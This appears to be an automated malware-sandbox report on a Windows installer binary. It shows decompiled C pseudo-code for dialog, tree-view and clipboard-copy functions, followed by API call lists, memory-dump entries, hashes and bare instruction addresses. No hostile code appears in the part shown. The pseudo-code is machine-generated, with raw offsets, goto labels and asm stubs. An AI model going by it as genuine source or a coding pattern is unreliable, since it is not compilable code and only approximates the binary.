                                                                                                							if(_t95 == 1) {
                                                                                                								_v60 = _t149;
                                                                                                								_v48 = 0x429fd8;
                                                                                                								_v44 = 0xfff;
                                                                                                								_a4 = _a8;
                                                                                                								do {
                                                                                                									_a4 = _a4 - 1;
                                                                                                									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                                                                                									__eflags = _a4 - _t149;
                                                                                                									_t162 = _t162 + _t98 + 2;
                                                                                                								} while (_a4 != _t149);
                                                                                                								OpenClipboard(_t149);
                                                                                                								EmptyClipboard();
                                                                                                								_t101 = GlobalAlloc(0x42, _t162);
                                                                                                								_a4 = _t101;
                                                                                                								_t163 = GlobalLock(_t101);
                                                                                                								do {
                                                                                                									_v48 = _t163;
                                                                                                									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                                                                									 *_t164 = 0xa0d;
                                                                                                									_t163 = _t164 + 2;
                                                                                                									_t149 = _t149 + 1;
                                                                                                									__eflags = _t149 - _a8;
                                                                                                								} while (_t149 < _a8);
                                                                                                								GlobalUnlock(_a4);
                                                                                                								SetClipboardData(1, _a4);
                                                                                                								CloseClipboard();
                                                                                                							}
                                                                                                							goto L37;
                                                                                                						}
                                                                                                						__eflags =  *0x42e32c - _t149; // 0x0
                                                                                                						if(__eflags == 0) {
                                                                                                							ShowWindow( *0x42eb68, 8);
                                                                                                							__eflags =  *0x42ebec - _t149; // 0x0
                                                                                                							if(__eflags == 0) {
                                                                                                								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
                                                                                                							}
                                                                                                							E00403CB6(1);
                                                                                                							goto L25;
                                                                                                						}
                                                                                                						 *0x4293a0 = 2;
                                                                                                						E00403CB6(0x78);
                                                                                                						goto L20;
                                                                                                					} else {
                                                                                                						__eflags = _a12 - 0x403;
                                                                                                						if(_a12 != 0x403) {
                                                                                                							L20:
                                                                                                							return E00403D44(_a8, _a12, _a16);
                                                                                                						}
                                                                                                						ShowWindow( *0x42e330, _t149);
                                                                                                						ShowWindow(_t154, 8);
                                                                                                						E00403D12(_t154);
                                                                                                						goto L17;
                                                                                                					}
                                                                                                				}
                                                                                                				_v52 = _v52 | 0xffffffff;
                                                                                                				_v40 = _v40 | 0xffffffff;
                                                                                                				_v60 = 2;
                                                                                                				_v56 = 0;
                                                                                                				_v48 = 0;
                                                                                                				_v44 = 0;
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				_t123 =  *0x42eb70; // 0x5ff628
                                                                                                				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                                                				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                                                				 *0x42e330 = GetDlgItem(_a4, 0x403);
                                                                                                				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
                                                                                                				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                                                				 *0x42e344 = _t127;
                                                                                                				_v8 = _t127;
                                                                                                				E00403D12( *0x42e330);
                                                                                                				 *0x42e334 = E0040456B(4);
                                                                                                				 *0x42e34c = 0;
                                                                                                				GetClientRect(_v8,  &_v28);
                                                                                                				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                                                				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                                                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                				if(_a8 >= 0) {
                                                                                                					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                                                					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                                                				}
                                                                                                				if(_a12 >= _t149) {
                                                                                                					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                                                                				}
                                                                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                				_push(0x1b);
                                                                                                				E00403CDD(_a4);
                                                                                                				if(( *0x42eb78 & 0x00000003) != 0) {
                                                                                                					ShowWindow( *0x42e330, _t149);
                                                                                                					if(( *0x42eb78 & 0x00000002) != 0) {
                                                                                                						 *0x42e330 = _t149;
                                                                                                					} else {
                                                                                                						ShowWindow(_v8, 8);
                                                                                                					}
                                                                                                					E00403D12( *0x42e328);
                                                                                                				}
                                                                                                				_t158 = GetDlgItem(_a4, 0x3ec);
                                                                                                				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                                                                				if(( *0x42eb78 & 0x00000004) != 0) {
                                                                                                					SendMessageA(_t158, 0x409, _t149, _a12);
                                                                                                					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                                                                				}
                                                                                                				goto L37;
                                                                                                			}



































                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 00404E66
                                                                                                • GetDlgItem.USER32 ref: 00404E75
                                                                                                • GetClientRect.USER32 ref: 00404EB2
                                                                                                • GetSystemMetrics.USER32 ref: 00404EBA
                                                                                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
                                                                                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
                                                                                                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
                                                                                                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
                                                                                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                                                                                                • ShowWindow.USER32(?,00000008), ref: 00404F56
                                                                                                • GetDlgItem.USER32 ref: 00404F77
                                                                                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
                                                                                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
                                                                                                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
                                                                                                • GetDlgItem.USER32 ref: 00404E84
                                                                                                  • Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20
                                                                                                • GetDlgItem.USER32 ref: 00404FC9
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004D9B,00000000), ref: 00404FD7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                                                                                • ShowWindow.USER32(00000000), ref: 00405002
                                                                                                • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                                                                                • ShowWindow.USER32(00000008), ref: 0040504E
                                                                                                • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
                                                                                                • CreatePopupMenu.USER32 ref: 00405091
                                                                                                • AppendMenuA.USER32 ref: 004050A6
                                                                                                • GetWindowRect.USER32 ref: 004050B9
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
                                                                                                • OpenClipboard.USER32(00000000), ref: 00405128
                                                                                                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                                                                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                                                                                • GlobalLock.KERNEL32 ref: 00405141
                                                                                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00405178
                                                                                                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040517E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                • String ID: {
                                                                                                • API String ID: 590372296-366298937
                                                                                                • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                                • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                                                                                • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                                • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 98%
                                                                                                			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                                				struct HWND__* _v8;
                                                                                                				struct HWND__* _v12;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				void* _v24;
                                                                                                				long _v28;
                                                                                                				int _v32;
                                                                                                				signed int _v40;
                                                                                                				int _v44;
                                                                                                				signed int* _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				signed int _v64;
                                                                                                				long _v68;
                                                                                                				void* _v72;
                                                                                                				intOrPtr _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				void* _v84;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				struct HWND__* _t182;
                                                                                                				intOrPtr _t183;
                                                                                                				int _t189;
                                                                                                				int _t196;
                                                                                                				intOrPtr _t198;
                                                                                                				long _t202;
                                                                                                				signed int _t206;
                                                                                                				signed int _t217;
                                                                                                				void* _t220;
                                                                                                				void* _t221;
                                                                                                				int _t227;
                                                                                                				intOrPtr _t231;
                                                                                                				signed int _t232;
                                                                                                				signed int _t233;
                                                                                                				signed int _t240;
                                                                                                				signed int _t242;
                                                                                                				signed int _t245;
                                                                                                				signed int _t247;
                                                                                                				struct HBITMAP__* _t250;
                                                                                                				void* _t252;
                                                                                                				char* _t268;
                                                                                                				signed char _t269;
                                                                                                				long _t274;
                                                                                                				int _t280;
                                                                                                				signed int* _t281;
                                                                                                				int _t282;
                                                                                                				long _t283;
                                                                                                				signed int* _t284;
                                                                                                				int _t285;
                                                                                                				long _t286;
                                                                                                				signed int _t287;
                                                                                                				long _t288;
                                                                                                				signed int _t291;
                                                                                                				int _t294;
                                                                                                				signed int _t298;
                                                                                                				signed int _t300;
                                                                                                				signed int _t302;
                                                                                                				intOrPtr _t309;
                                                                                                				int* _t310;
                                                                                                				void* _t311;
                                                                                                				int _t315;
                                                                                                				int _t316;
                                                                                                				int _t317;
                                                                                                				signed int _t318;
                                                                                                				void* _t320;
                                                                                                				void* _t328;
                                                                                                				void* _t331;
                                                                                                
                                                                                                				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                				_t182 = GetDlgItem(_a4, 0x408);
                                                                                                				_t280 =  *0x42eb88; // 0x5ff7d4
                                                                                                				_t320 = SendMessageA;
                                                                                                				_v8 = _t182;
                                                                                                				_t183 =  *0x42eb70; // 0x5ff628
                                                                                                				_t315 = 0;
                                                                                                				_v32 = _t280;
                                                                                                				_v20 = _t183 + 0x94;
                                                                                                				if(_a8 != 0x110) {
                                                                                                					L23:
                                                                                                					__eflags = _a8 - 0x405;
                                                                                                					if(_a8 != 0x405) {
                                                                                                						_t289 = _a16;
                                                                                                					} else {
                                                                                                						_a12 = _t315;
                                                                                                						_t289 = 1;
                                                                                                						_a8 = 0x40f;
                                                                                                						_a16 = 1;
                                                                                                					}
                                                                                                					__eflags = _a8 - 0x4e;
                                                                                                					if(_a8 == 0x4e) {
                                                                                                						L28:
                                                                                                						__eflags = _a8 - 0x413;
                                                                                                						_v16 = _t289;
                                                                                                						if(_a8 == 0x413) {
                                                                                                							L30:
                                                                                                							__eflags =  *0x42eb79 & 0x00000002;
                                                                                                							if(( *0x42eb79 & 0x00000002) != 0) {
                                                                                                								L41:
                                                                                                								__eflags = _v16 - _t315;
                                                                                                								if(_v16 != _t315) {
                                                                                                									_t232 = _v16;
                                                                                                									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                                                                                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                                										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                                									}
                                                                                                									_t233 = _v16;
                                                                                                									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                                                                                									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                                										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                                                                                										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                                											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                                                                                											 *_t284 =  *_t284 & 0xffffffdf;
                                                                                                											__eflags =  *_t284;
                                                                                                										} else {
                                                                                                											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								goto L48;
                                                                                                							}
                                                                                                							__eflags = _a8 - 0x413;
                                                                                                							if(_a8 == 0x413) {
                                                                                                								L33:
                                                                                                								__eflags = _a8 - 0x413;
                                                                                                								_t289 = 0 | _a8 != 0x00000413;
                                                                                                								_t240 = E00404598(_v8, _a8 != 0x413);
                                                                                                								__eflags = _t240 - _t315;
                                                                                                								if(_t240 >= _t315) {
                                                                                                									_t93 = _t280 + 8; // 0x8
                                                                                                									_t310 = _t240 * 0x418 + _t93;
                                                                                                									_t289 =  *_t310;
                                                                                                									__eflags = _t289 & 0x00000010;
                                                                                                									if((_t289 & 0x00000010) == 0) {
                                                                                                										__eflags = _t289 & 0x00000040;
                                                                                                										if((_t289 & 0x00000040) == 0) {
                                                                                                											_t298 = _t289 ^ 0x00000001;
                                                                                                											__eflags = _t298;
                                                                                                										} else {
                                                                                                											_t300 = _t289 ^ 0x00000080;
                                                                                                											__eflags = _t300;
                                                                                                											if(_t300 >= 0) {
                                                                                                												_t298 = _t300 & 0xfffffffe;
                                                                                                											} else {
                                                                                                												_t298 = _t300 | 0x00000001;
                                                                                                											}
                                                                                                										}
                                                                                                										 *_t310 = _t298;
                                                                                                										E0040117D(_t240);
                                                                                                										_t242 =  *0x42eb78; // 0x80
                                                                                                										_t289 = 1;
                                                                                                										_a8 = 0x40f;
                                                                                                										_t245 =  !_t242 >> 0x00000008 & 1;
                                                                                                										__eflags = _t245;
                                                                                                										_a12 = 1;
                                                                                                										_a16 = _t245;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L41;
                                                                                                							}
                                                                                                							_t289 = _a16;
                                                                                                							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                                                                                							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                                                                                								goto L41;
                                                                                                							}
                                                                                                							goto L33;
                                                                                                						}
                                                                                                						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                                                                                						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                                                                                							goto L48;
                                                                                                						}
                                                                                                						goto L30;
                                                                                                					} else {
                                                                                                						__eflags = _a8 - 0x413;
                                                                                                						if(_a8 != 0x413) {
                                                                                                							L48:
                                                                                                							__eflags = _a8 - 0x111;
                                                                                                							if(_a8 != 0x111) {
                                                                                                								L56:
                                                                                                								__eflags = _a8 - 0x200;
                                                                                                								if(_a8 == 0x200) {
                                                                                                									SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                                								}
                                                                                                								__eflags = _a8 - 0x40b;
                                                                                                								if(_a8 == 0x40b) {
                                                                                                									_t220 =  *0x429fb4;
                                                                                                									__eflags = _t220 - _t315;
                                                                                                									if(_t220 != _t315) {
                                                                                                										ImageList_Destroy(_t220);
                                                                                                									}
                                                                                                									_t221 =  *0x429fcc;
                                                                                                									__eflags = _t221 - _t315;
                                                                                                									if(_t221 != _t315) {
                                                                                                										GlobalFree(_t221);
                                                                                                									}
                                                                                                									 *0x429fb4 = _t315;
                                                                                                									 *0x429fcc = _t315;
                                                                                                									 *0x42ebc0 = _t315;
                                                                                                								}
                                                                                                								__eflags = _a8 - 0x40f;
                                                                                                								if(_a8 != 0x40f) {
                                                                                                									L86:
                                                                                                									__eflags = _a8 - 0x420;
                                                                                                									if(_a8 == 0x420) {
                                                                                                										__eflags =  *0x42eb79 & 0x00000001;
                                                                                                										if(( *0x42eb79 & 0x00000001) != 0) {
                                                                                                											__eflags = _a16 - 0x20;
                                                                                                											_t189 = (0 | _a16 == 0x00000020) << 3;
                                                                                                											__eflags = _t189;
                                                                                                											_t316 = _t189;
                                                                                                											ShowWindow(_v8, _t316);
                                                                                                											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                                										}
                                                                                                									}
                                                                                                									goto L89;
                                                                                                								} else {
                                                                                                									E004011EF(_t289, _t315, _t315);
                                                                                                									__eflags = _a12 - _t315;
                                                                                                									if(_a12 != _t315) {
                                                                                                										E0040140B(8);
                                                                                                									}
                                                                                                									__eflags = _a16 - _t315;
                                                                                                									if(_a16 == _t315) {
                                                                                                										L73:
                                                                                                										E004011EF(_t289, _t315, _t315);
                                                                                                										__eflags =  *0x42eb8c - _t315; // 0x2
                                                                                                										_v32 =  *0x429fcc;
                                                                                                										_t196 =  *0x42eb88; // 0x5ff7d4
                                                                                                										_v60 = 0xf030;
                                                                                                										_v16 = _t315;
                                                                                                										if(__eflags <= 0) {
                                                                                                											L84:
                                                                                                											InvalidateRect(_v8, _t315, 1);
                                                                                                											_t198 =  *0x42e33c; // 0x6055b9
                                                                                                											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                                                                                											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                                                                												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
                                                                                                											}
                                                                                                											goto L86;
                                                                                                										} else {
                                                                                                											_t142 = _t196 + 8; // 0x5ff7dc
                                                                                                											_t281 = _t142;
                                                                                                											do {
                                                                                                												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                                												__eflags = _t202 - _t315;
                                                                                                												if(_t202 != _t315) {
                                                                                                													_t291 =  *_t281;
                                                                                                													_v68 = _t202;
                                                                                                													__eflags = _t291 & 0x00000001;
                                                                                                													_v72 = 8;
                                                                                                													if((_t291 & 0x00000001) != 0) {
                                                                                                														_t151 =  &(_t281[4]); // 0x5ff7ec
                                                                                                														_v72 = 9;
                                                                                                														_v56 = _t151;
                                                                                                														_t154 =  &(_t281[0]);
                                                                                                														 *_t154 = _t281[0] & 0x000000fe;
                                                                                                														__eflags =  *_t154;
                                                                                                													}
                                                                                                													__eflags = _t291 & 0x00000040;
                                                                                                													if((_t291 & 0x00000040) == 0) {
                                                                                                														_t206 = (_t291 & 0x00000001) + 1;
                                                                                                														__eflags = _t291 & 0x00000010;
                                                                                                														if((_t291 & 0x00000010) != 0) {
                                                                                                															_t206 = _t206 + 3;
                                                                                                															__eflags = _t206;
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t206 = 3;
                                                                                                													}
                                                                                                													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                                                                                													__eflags = _t294;
                                                                                                													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                                													SendMessageA(_v8, 0x1102, _t294, _v68);
                                                                                                													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                                												}
                                                                                                												_v16 = _v16 + 1;
                                                                                                												_t281 =  &(_t281[0x106]);
                                                                                                												__eflags = _v16 -  *0x42eb8c; // 0x2
                                                                                                											} while (__eflags < 0);
                                                                                                											goto L84;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t282 = E004012E2( *0x429fcc);
                                                                                                										E00401299(_t282);
                                                                                                										_t217 = 0;
                                                                                                										_t289 = 0;
                                                                                                										__eflags = _t282 - _t315;
                                                                                                										if(_t282 <= _t315) {
                                                                                                											L72:
                                                                                                											SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                                											_a16 = _t282;
                                                                                                											_a8 = 0x420;
                                                                                                											goto L73;
                                                                                                										} else {
                                                                                                											goto L69;
                                                                                                										}
                                                                                                										do {
                                                                                                											L69:
                                                                                                											_t309 = _v20;
                                                                                                											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                                                                                											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                                                                                												_t289 = _t289 + 1;
                                                                                                												__eflags = _t289;
                                                                                                											}
                                                                                                											_t217 = _t217 + 1;
                                                                                                											__eflags = _t217 - _t282;
                                                                                                										} while (_t217 < _t282);
                                                                                                										goto L72;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							__eflags = _a12 - 0x3f9;
                                                                                                							if(_a12 != 0x3f9) {
                                                                                                								goto L89;
                                                                                                							}
                                                                                                							__eflags = _a12 >> 0x10 - 1;
                                                                                                							if(_a12 >> 0x10 != 1) {
                                                                                                								goto L89;
                                                                                                							}
                                                                                                							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                                							__eflags = _t227 - 0xffffffff;
                                                                                                							if(_t227 == 0xffffffff) {
                                                                                                								goto L89;
                                                                                                							}
                                                                                                							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                                							__eflags = _t283 - 0xffffffff;
                                                                                                							if(_t283 == 0xffffffff) {
                                                                                                								L54:
                                                                                                								_t283 = 0x20;
                                                                                                								L55:
                                                                                                								E00401299(_t283);
                                                                                                								SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                                								_a12 = 1;
                                                                                                								_a16 = _t315;
                                                                                                								_a8 = 0x40f;
                                                                                                								goto L56;
                                                                                                							}
                                                                                                							_t231 = _v20;
                                                                                                							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                                                                                							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                                                                                								goto L55;
                                                                                                							}
                                                                                                							goto L54;
                                                                                                						}
                                                                                                						goto L28;
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *0x42ebc0 = _a4;
                                                                                                					_t247 =  *0x42eb8c; // 0x2
                                                                                                					_t285 = 2;
                                                                                                					_v28 = 0;
                                                                                                					_v16 = _t285;
                                                                                                					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
                                                                                                					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
                                                                                                					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
                                                                                                					_v24 = _t250;
                                                                                                					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
                                                                                                					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                					 *0x429fb4 = _t252;
                                                                                                					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                                					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
                                                                                                					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                                					}
                                                                                                					DeleteObject(_v24);
                                                                                                					_t286 = 0;
                                                                                                					do {
                                                                                                						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                                						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                                							if(_t286 != 0x20) {
                                                                                                								_v16 = _t315;
                                                                                                							}
                                                                                                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                                						}
                                                                                                						_t286 = _t286 + 1;
                                                                                                					} while (_t286 < 0x21);
                                                                                                					_t317 = _a16;
                                                                                                					_t287 = _v16;
                                                                                                					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                                					_push(0x15);
                                                                                                					E00403CDD(_a4);
                                                                                                					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                                					_push(0x16);
                                                                                                					E00403CDD(_a4);
                                                                                                					_t318 = 0;
                                                                                                					_t288 = 0;
                                                                                                					_t328 =  *0x42eb8c - _t318; // 0x2
                                                                                                					if(_t328 <= 0) {
                                                                                                						L19:
                                                                                                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                						goto L20;
                                                                                                					} else {
                                                                                                						_t311 = _v32 + 8;
                                                                                                						_v24 = _t311;
                                                                                                						do {
                                                                                                							_t268 = _t311 + 0x10;
                                                                                                							if( *_t268 != 0) {
                                                                                                								_v60 = _t268;
                                                                                                								_t269 =  *_t311;
                                                                                                								_t302 = 0x20;
                                                                                                								_v84 = _t288;
                                                                                                								_v80 = 0xffff0002;
                                                                                                								_v76 = 0xd;
                                                                                                								_v64 = _t302;
                                                                                                								_v40 = _t318;
                                                                                                								_v68 = _t269 & _t302;
                                                                                                								if((_t269 & 0x00000002) == 0) {
                                                                                                									__eflags = _t269 & 0x00000004;
                                                                                                									if((_t269 & 0x00000004) == 0) {
                                                                                                										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                									} else {
                                                                                                										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                                									}
                                                                                                								} else {
                                                                                                									_v76 = 0x4d;
                                                                                                									_v44 = 1;
                                                                                                									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                									_v28 = 1;
                                                                                                									 *( *0x429fcc + _t318 * 4) = _t274;
                                                                                                									_t288 =  *( *0x429fcc + _t318 * 4);
                                                                                                								}
                                                                                                							}
                                                                                                							_t318 = _t318 + 1;
                                                                                                							_t311 = _v24 + 0x418;
                                                                                                							_t331 = _t318 -  *0x42eb8c; // 0x2
                                                                                                							_v24 = _t311;
                                                                                                						} while (_t331 < 0);
                                                                                                						if(_v28 != 0) {
                                                                                                							L20:
                                                                                                							if(_v16 != 0) {
                                                                                                								E00403D12(_v8);
                                                                                                								_t280 = _v32;
                                                                                                								_t315 = 0;
                                                                                                								__eflags = 0;
                                                                                                								goto L23;
                                                                                                							} else {
                                                                                                								ShowWindow(_v12, 5);
                                                                                                								E00403D12(_v12);
                                                                                                								L89:
                                                                                                								return E00403D44(_a8, _a12, _a16);
                                                                                                							}
                                                                                                						}
                                                                                                						goto L19;
                                                                                                					}
                                                                                                				}
                                                                                                			}






































































                                                                                                0x00000000
                                                                                                0x004048b7
                                                                                                0x004048b7
                                                                                                0x004048ba
                                                                                                0x004049a7
                                                                                                0x004049a7
                                                                                                0x004049ae
                                                                                                0x00404a22
                                                                                                0x00404a22
                                                                                                0x00404a29
                                                                                                0x00404a35
                                                                                                0x00404a35
                                                                                                0x00404a37
                                                                                                0x00404a3e
                                                                                                0x00404a40
                                                                                                0x00404a45
                                                                                                0x00404a47
                                                                                                0x00404a4a
                                                                                                0x00404a4a
                                                                                                0x00404a50
                                                                                                0x00404a55
                                                                                                0x00404a57
                                                                                                0x00404a5a
                                                                                                0x00404a5a
                                                                                                0x00404a60
                                                                                                0x00404a66
                                                                                                0x00404a6c
                                                                                                0x00404a6c
                                                                                                0x00404a72
                                                                                                0x00404a79
                                                                                                0x00404bc6
                                                                                                0x00404bc6
                                                                                                0x00404bcd
                                                                                                0x00404bcf
                                                                                                0x00404bd6
                                                                                                0x00404bda
                                                                                                0x00404be7
                                                                                                0x00404be7
                                                                                                0x00404bea
                                                                                                0x00404bf0
                                                                                                0x00404c02
                                                                                                0x00404c02
                                                                                                0x00404bd6
                                                                                                0x00000000
                                                                                                0x00404a7f
                                                                                                0x00404a81
                                                                                                0x00404a86
                                                                                                0x00404a89
                                                                                                0x00404a8d
                                                                                                0x00404a8d
                                                                                                0x00404a92
                                                                                                0x00404a95
                                                                                                0x00404ad6
                                                                                                0x00404ad8
                                                                                                0x00404ae2
                                                                                                0x00404ae8
                                                                                                0x00404aeb
                                                                                                0x00404af0
                                                                                                0x00404af7
                                                                                                0x00404afa
                                                                                                0x00404b9c
                                                                                                0x00404ba2
                                                                                                0x00404ba8
                                                                                                0x00404bad
                                                                                                0x00404bb0
                                                                                                0x00404bc1
                                                                                                0x00404bc1
                                                                                                0x00000000
                                                                                                0x00404b00
                                                                                                0x00404b00
                                                                                                0x00404b00
                                                                                                0x00404b03
                                                                                                0x00404b09
                                                                                                0x00404b0c
                                                                                                0x00404b0e
                                                                                                0x00404b10
                                                                                                0x00404b12
                                                                                                0x00404b15
                                                                                                0x00404b18
                                                                                                0x00404b1f
                                                                                                0x00404b21
                                                                                                0x00404b24
                                                                                                0x00404b2b
                                                                                                0x00404b2e
                                                                                                0x00404b2e
                                                                                                0x00404b2e
                                                                                                0x00404b2e
                                                                                                0x00404b32
                                                                                                0x00404b35
                                                                                                0x00404b41
                                                                                                0x00404b42
                                                                                                0x00404b45
                                                                                                0x00404b47
                                                                                                0x00404b47
                                                                                                0x00404b47
                                                                                                0x00404b37
                                                                                                0x00404b39
                                                                                                0x00404b39
                                                                                                0x00404b66
                                                                                                0x00404b66
                                                                                                0x00404b67
                                                                                                0x00404b73
                                                                                                0x00404b82
                                                                                                0x00404b82
                                                                                                0x00404b84
                                                                                                0x00404b87
                                                                                                0x00404b90
                                                                                                0x00404b90
                                                                                                0x00000000
                                                                                                0x00404b03
                                                                                                0x00404a97
                                                                                                0x00404aa2
                                                                                                0x00404aa5
                                                                                                0x00404aaa
                                                                                                0x00404aac
